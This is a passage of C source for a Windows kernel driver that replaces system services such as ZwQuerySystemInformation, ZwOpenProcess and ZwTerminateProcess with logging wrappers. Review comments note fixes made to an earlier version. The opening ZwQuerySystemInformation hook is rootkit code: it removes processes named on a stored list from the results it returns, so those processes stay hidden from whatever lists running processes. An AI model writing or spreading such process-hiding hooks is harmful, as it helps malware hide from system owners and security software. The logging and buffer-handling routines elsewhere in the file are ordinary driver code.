TCHAR pMessage[256];
TCHAR pOperation[32] = "ZwQuerySystemInformation";
GetProcessName(pMessage,pOperation);
if(SystemInformationClass == 5)
{
DbgPrint("ZwQuerySystemInformation for Process/Thead\n");
}
NtStatus = (OldZwQuerySystemInformation)(SystemInformationClass,
SystemInformation,
SystemInformaitonLength,
ReturnLength);
if(NT_SUCCESS(NtStatus) && SystemInformationClass == 5)
{
for(dwCount = 0; dwCount < 2; dwCount ++)
{
ProcCur = (PSYSTEM_PROCESSES)SystemInformation;
while(ProcCur != NULL)
{
pCurrentNK = pFirstNK;
while(pCurrentNK != NULL)
{
if(RtlCompareUnicodeString(&pCurrentNK->Name,&ProcCur->ProcessName,TRUE) == 0)
{
RtlUnicodeStringToAnsiString(&ProcNameA,&pCurrentNK->Name,TRUE);
DbgPrint("Hidden Process Name: %s\n",ProcNameA.Buffer);
if(ProcPre != NULL)
{
if(ProcCur->NextEntryDelta != 0)
{
ProcPre->NextEntryDelta += ProcCur->NextEntryDelta;
}
else
{
ProcPre->NextEntryDelta = 0;
}
}
else
{
if(ProcCur->NextEntryDelta != 0)
{
SystemInformation = (PSYSTEM_PROCESSES)((PTSTR)ProcCur + ProcCur->NextEntryDelta);
}
else
{
SystemInformation = NULL;
}
}
break;
}
else
{
pCurrentNK = pCurrentNK->Next;
}
}
ProcPre = ProcCur;
if(ProcCur->NextEntryDelta != 0)
{
ProcCur = (PSYSTEM_PROCESSES)((PTSTR)ProcCur + ProcCur->NextEntryDelta);
}
else
{
ProcCur = NULL;
}
}
}
UpdateMessageK(Sequence++,(PTSTR)pMessage);
}
return NtStatus;
}
NTSTATUS
NewZwOpenProcess(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL)
{
    /*
     * Replacement entry for ZwOpenProcess. Builds a "<pid>\t<operation>"
     * record for the caller with GetProcessName, forwards every argument
     * unchanged to the saved original entry point (OldZwOpenProcess, set
     * up outside this listing), then appends the record to the kernel
     * message log under the next value of the global Sequence counter.
     * Returns the original service's status untouched.
     */
    TCHAR szRecord[256];
    TCHAR szOperation[32] = "ZwOpenProcess";
    NTSTATUS Status;

    GetProcessName(szRecord, szOperation);
    Status = (OldZwOpenProcess)(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId);
    /* Sequence++ is a plain read-modify-write on a shared counter; not synchronized here. */
    UpdateMessageK(Sequence++, (PTSTR)szRecord);
    return Status;
}
NTSTATUS
NewZwTerminateProcess(
    IN HANDLE ProcessHandle OPTIONAL,
    IN NTSTATUS ExitStatus)
{
    /*
     * Replacement entry for ZwTerminateProcess. Logs "<pid>\t<operation>"
     * for the calling process, forwards the call to the saved original
     * (OldZwTerminateProcess) without altering its arguments, and records
     * the message under the next global Sequence number. The original
     * status is returned unchanged.
     */
    TCHAR szRecord[256];
    TCHAR szOperation[32] = "ZwTerminateProcess";
    NTSTATUS Status;

    GetProcessName(szRecord, szOperation);
    Status = (OldZwTerminateProcess)(ProcessHandle, ExitStatus);
    /* Sequence++ is a plain read-modify-write on a shared counter; not synchronized here. */
    UpdateMessageK(Sequence++, (PTSTR)szRecord);
    return Status;
}
NTSTATUS
NewZwQueryInformationProcess(
    IN HANDLE ProcessHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN ULONG ProcessInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
    /*
     * Replacement entry for ZwQueryInformationProcess. Logs
     * "<pid>\t<operation>" for the caller, forwards all five arguments to
     * the saved original (OldZwQueryInformationProcess), and appends the
     * record to the message log with the next global Sequence value. The
     * query result and status are passed back exactly as returned.
     */
    TCHAR szRecord[256];
    TCHAR szOperation[32] = "ZwQueryInformationProcess";
    NTSTATUS Status;

    GetProcessName(szRecord, szOperation);
    Status = (OldZwQueryInformationProcess)(ProcessHandle,
                                           ProcessInformationClass,
                                           ProcessInformation,
                                           ProcessInformationLength,
                                           ReturnLength);
    /* Sequence++ is a plain read-modify-write on a shared counter; not synchronized here. */
    UpdateMessageK(Sequence++, (PTSTR)szRecord);
    return Status;
}
NTSTATUS
NewZwSetInformationProcess(
    IN HANDLE ProcessHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    IN PVOID ProcessInformation,
    IN ULONG ProcessInformationLength)
{
    /*
     * Replacement entry for ZwSetInformationProcess. Logs
     * "<pid>\t<operation>" for the caller, forwards the call unchanged to
     * the saved original (OldZwSetInformationProcess), and records the
     * message under the next global Sequence number. Returns the original
     * status.
     */
    TCHAR szRecord[256];
    TCHAR szOperation[32] = "ZwSetInformationProcess";
    NTSTATUS Status;

    GetProcessName(szRecord, szOperation);
    Status = (OldZwSetInformationProcess)(ProcessHandle,
                                         ProcessInformationClass,
                                         ProcessInformation,
                                         ProcessInformationLength);
    /* Sequence++ is a plain read-modify-write on a shared counter; not synchronized here. */
    UpdateMessageK(Sequence++, (PTSTR)szRecord);
    return Status;
}
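VOID
GetProcessNameOffset()
{
    /*
     * Find the byte offset of the image-name field inside the EPROCESS of
     * the current process by scanning the object for the string "System",
     * and store it in the global NameOffset. Presumably called while the
     * current process is System (e.g. from DriverEntry) — confirm; within
     * this listing NameOffset is only consumed by commented-out code in
     * GetProcessName.
     *
     * Changes from the original: the scan stops at the first match (the
     * original kept going and kept the last one, printing on every hit),
     * and the candidate address is formed by pointer arithmetic instead of
     * a cast through ULONG, which truncates the pointer on 64-bit builds.
     *
     * NOTE(review): scanning 3 * PAGE_SIZE bytes from the object start is a
     * heuristic; it assumes those bytes are mapped — confirm for the target
     * kernel, since a miss would leave NameOffset unset and touch memory
     * beyond the EPROCESS.
     */
    TCHAR SysName[] = "System";
    PTSTR pBase = (PTSTR)PsGetCurrentProcess();
    ULONG i;

    for (i = 0; i < 3 * PAGE_SIZE; i++) {
        if (strncmp(SysName, pBase + i, sizeof SysName - 1) == 0) {
            NameOffset = i;
            DbgPrint("*********** NameOffset == 0x%x ***********\n", NameOffset);
            break;
        }
    }
}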
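VOID
GetProcessName(PTSTR pMessage, PTSTR pOperation)
{
    /*
     * Format the log record "<pid>\t<operation>" into pMessage and echo it
     * to the kernel debugger.
     *
     * pMessage   - caller-owned buffer. Every caller in this file passes a
     *              TCHAR[256]; that size is the bound used here.
     * pOperation - NUL-terminated name of the intercepted service.
     *
     * Changes from the original: the unused pProcessName/pEProcess locals
     * (the EPROCESS-based name lookup via NameOffset was already commented
     * out) are gone; the pointer-sized HANDLE from PsGetCurrentProcessId
     * is narrowed explicitly instead of being passed to "%d"; and the
     * format is bounded so an over-long operation name cannot overrun
     * pMessage.
     */
    enum { MESSAGE_CHARS = 256 };
    ULONG Pid = (ULONG)(ULONG_PTR)PsGetCurrentProcessId();
    int Written;

    Written = _snprintf(pMessage, MESSAGE_CHARS, "%lu\t%s", Pid, pOperation);
    if (Written < 0 || Written >= MESSAGE_CHARS) {
        /* _snprintf does not NUL-terminate on truncation; do it by hand. */
        pMessage[MESSAGE_CHARS - 1] = '\0';
    }
    DbgPrint("%s\n", pMessage);
}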
VOID
FreeProcessNameK(VOID)
{
    /*
     * Release every PROCNAMEK node on the pFirstNK list, walking from the
     * head and advancing the head pointer as each node is freed, so that
     * pFirstNK is NULL on return.
     */
    PPROCNAMEK pNext;

    for (; pFirstNK != NULL; pFirstNK = pNext) {
        pNext = pFirstNK->Next;
        ExFreePool(pFirstNK);
    }
}
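VOID
FreeMessageK(VOID)
{
    /*
     * Release every MESSAGEK node starting at pFirstMK and reset the list
     * state: pFirstMK and pCurrentMK become NULL and NumMessageK (the node
     * count that NewMessageK increments per allocation) returns to 0.
     *
     * The original freed the nodes but left pFirstMK pointing at freed
     * pool, so a later NewMessageK could never take its empty-list path and
     * ResetMessageK would dereference freed memory.
     */
    PMESSAGEK pNode = pFirstMK;
    PMESSAGEK pNext;

    while (pNode != NULL) {
        pNext = pNode->Next;
        ExFreePool(pNode);
        pNode = pNext;
    }
    pFirstMK = NULL;
    pCurrentMK = NULL;
    NumMessageK = 0;
}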
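VOID
NewMessageK(VOID)
{
    /*
     * Move the writer (pCurrentMK) to a fresh MESSAGEK block.
     *
     * - Empty list: allocate the head block and make it current.
     * - Already MaxMessageK blocks, or allocation fails: reuse the current
     *   block by resetting its Length to 0 (its old contents are
     *   overwritten by later writes).
     * - Current block still empty (Length == 0): nothing to do.
     * - Otherwise link a new NonPagedPool block after pCurrentMK, make it
     *   current and bump NumMessageK.
     *
     * The original dereferenced pCurrentMK before its "both pointers NULL"
     * branch, so that branch was unreachable without a NULL dereference;
     * the NULL cases are handled first here.
     */
    PMESSAGEK pNewMK;

    if (pCurrentMK == NULL) {
        if (pFirstMK != NULL) {
            /* Writer detached but list present (e.g. after a reset): resume at the head. */
            pCurrentMK = pFirstMK;
        } else {
            pNewMK = ExAllocatePool(NonPagedPool, sizeof(MESSAGEK));
            if (pNewMK == NULL) {
                DbgPrint("NewMessageK: ExAllocatePool failed, no message block\n");
                return;
            }
            pNewMK->Length = 0;
            pNewMK->Next = NULL;
            pFirstMK = pNewMK;
            pCurrentMK = pNewMK;
            NumMessageK = 1;   /* the list now holds exactly this block */
            return;
        }
    }

    if (NumMessageK >= MaxMessageK) {
        pCurrentMK->Length = 0;
        return;
    }
    if (pCurrentMK->Length == 0) {
        return;
    }

    pNewMK = ExAllocatePool(NonPagedPool, sizeof(MESSAGEK));
    if (pNewMK == NULL) {
        /* Out of pool: keep logging into the current block from its start. */
        pCurrentMK->Length = 0;
        return;
    }
    pNewMK->Length = 0;
    pNewMK->Next = NULL;
    pCurrentMK->Next = pNewMK;
    pCurrentMK = pNewMK;
    NumMessageK++;
}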
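VOID
ResetMessageK(VOID)
{
    /*
     * Drop every block after the head, keep the head, empty it, and make it
     * the current writer again; NumMessageK is set to match the one
     * remaining block. With no list at all, both pointers are left NULL.
     *
     * The original dereferenced pFirstMK unconditionally and, because it
     * walked with pCurrentMK itself, returned with pCurrentMK == NULL; the
     * next UpdateMessageK would then fault unless the caller restored the
     * pointer. Both are handled here.
     */
    PMESSAGEK pNode;
    PMESSAGEK pNext;

    if (pFirstMK == NULL) {
        pCurrentMK = NULL;
        NumMessageK = 0;
        return;
    }

    pNode = pFirstMK->Next;
    while (pNode != NULL) {
        pNext = pNode->Next;
        ExFreePool(pNode);
        pNode = pNext;
    }
    pFirstMK->Next = NULL;
    pFirstMK->Length = 0;
    pCurrentMK = pFirstMK;
    NumMessageK = 1;
}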
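VOID
UpdateMessageK(
    ULONG Seq,
    PTSTR pData)
{
    /*
     * Append one record {Seq, pData} to the current MESSAGEK block.
     *
     * Seq   - sequence number stored in front of the text.
     * pData - NUL-terminated text; a NULL pointer is ignored.
     *
     * The record is viewed through PMESSAGEU as a Sequence field followed
     * by the text and its terminator, and pCurrentMK->Length advances by
     * sizeof(Seq) + text length + 1, as in the original. When fewer than
     * 500 bytes remain the writer first moves to a fresh block through
     * NewMessageK.
     *
     * Changes from the original: pCurrentMK itself is checked for NULL (the
     * old test checked the computed pTempMU, which cannot be NULL when
     * pCurrentMK is valid); the text is truncated so the record never runs
     * past MAX_MESSAGE bytes of the block instead of an unbounded sprintf;
     * and MKMutex is held around the whole read-check-write rather than
     * only the final store, so two callers cannot pick the same position.
     *
     * NOTE(review): assumes pCurrentMK->Message holds MAX_MESSAGE bytes and
     * that MUTEX_P may be held across NewMessageK's pool allocation (the
     * macro's definition is not in this listing) — confirm both.
     */
    PMESSAGEU pRecord;
    ULONG Remaining;
    ULONG TextLength;

    if (pData == NULL) {
        return;
    }

    MUTEX_P(MKMutex);

    if (pCurrentMK != NULL && pCurrentMK->Length > MAX_MESSAGE - 500) {
        NewMessageK();
    }

    if (pCurrentMK == NULL) {
        DbgPrint("UpdateMessageK: no current message block\n");
    } else if (pCurrentMK->Length + sizeof(Seq) + 1 > MAX_MESSAGE) {
        /* Not even room for the header and a terminator; drop the record. */
        DbgPrint("UpdateMessageK: message block full, record dropped\n");
    } else {
        Remaining = (ULONG)(MAX_MESSAGE - pCurrentMK->Length - sizeof(Seq) - 1);
        TextLength = (ULONG)strlen(pData);
        if (TextLength > Remaining) {
            TextLength = Remaining;   /* truncate, keeping the record inside the block */
        }
        pRecord = (PMESSAGEU)(pCurrentMK->Message + pCurrentMK->Length);
        pRecord->Sequence = Seq;
        RtlCopyMemory(pRecord->Message, pData, TextLength);
        pRecord->Message[TextLength] = '\0';
        pCurrentMK->Length += sizeof(Seq) + TextLength + 1;
    }

    MUTEX_V(MKMutex);
}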